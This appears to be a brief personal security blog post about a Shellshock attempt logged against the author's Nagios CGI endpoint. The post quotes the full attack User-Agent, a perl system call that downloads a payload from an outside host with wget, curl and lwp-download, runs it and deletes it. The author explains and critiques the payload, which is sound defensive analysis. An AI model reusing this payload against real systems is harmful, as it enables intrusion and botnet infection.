Just a short one for now: Tonight I received a maximum severity alert from my SIEM, one of my internet-facing webservers received a shellshock attack! After a quick check for successful exploitation (not that I could see) I went back to sleep.

This is what was attempted (except not defanged, duh):

Timestamp: 2025-06-14T01:23:07+0200
Source IP: 104.131.118.62
Action: GET /nagios/cgi-bin/status.cgi HTTP/1.1
User Agent: () { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnZAZAZA\x22';system(\x22wget -O /tmp/gif.gif http[://]pjsn[.]hi2[.]ro/gif.gif;curl -O /tmp/gif.gif http[://]pjsn[.]hi2[.]ro/gif.gif; lwp-download -a http[://]pjsn[.]hi2[.]ro/gif.gif /tmp/gif.gif;perl /tmp/gif.gif;rm -rf /tmp/gif.gif*;exit\x22)

Or in human: Use the useragent to do the (){ :;}; thing, print something in perl I haven't fully made sense of yet, system to download a file (three different ways, depending on what downloader is available), execute the file as a perl script, then clean up behind yourself.

I just want to point out though: I think this is broken in multiple ways?

• Closing single quote for the perl -e does not include the system when it should?

• curl usage of the -O flag is incorrect here, definitely made that mistake myself though.

I downloaded the file manually, you can find it here. ZIP password is ENqHNXX2JM0w. It presents itself as "DDoS Perl IrcBot v.10 / 2012 by w0rmer Security Team", a "Stealth MultiFunctional IrcBot written in Perl". I hate Perl. Thankfully it has a disclaimer "Created for educational purposes only. I'm not responsible for the illegal use of this program". Good to know!

I'd throw some IOTs on OTX but, like, half them are whitelisted, not gonna bother for now...